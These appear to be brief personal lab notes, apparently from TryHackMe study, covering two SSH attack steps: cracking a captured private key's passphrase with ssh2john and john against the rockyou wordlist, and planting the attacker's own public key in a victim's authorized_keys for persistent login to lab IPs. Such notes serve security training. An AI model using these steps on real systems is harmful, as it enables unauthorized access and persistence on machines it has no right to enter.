RSA

cp id_rsa
ssh2john id_rsa > forjohn
john forjohn 

john forjohn --wordlist=/usr/share/wordlist/rockyou.txt

ssh -i id_rsa jan@10.10.135.133

passhprase from john

If we have a permission in rsa authorized keys in victim's machine we can input our own ssh public key

ssh-keygen -t rsa
(enter passphrase)
cat id_rsa.pub 

victim machine
paste it in the authorized_keys

attacker machine
ssh -i (theNAMEofSSH) user@10.10.10.10
ssh -i trylangssh user@10.10.10.10
(enter passphrase)
  • Tryhackme - Linux File System Analysis

Last updated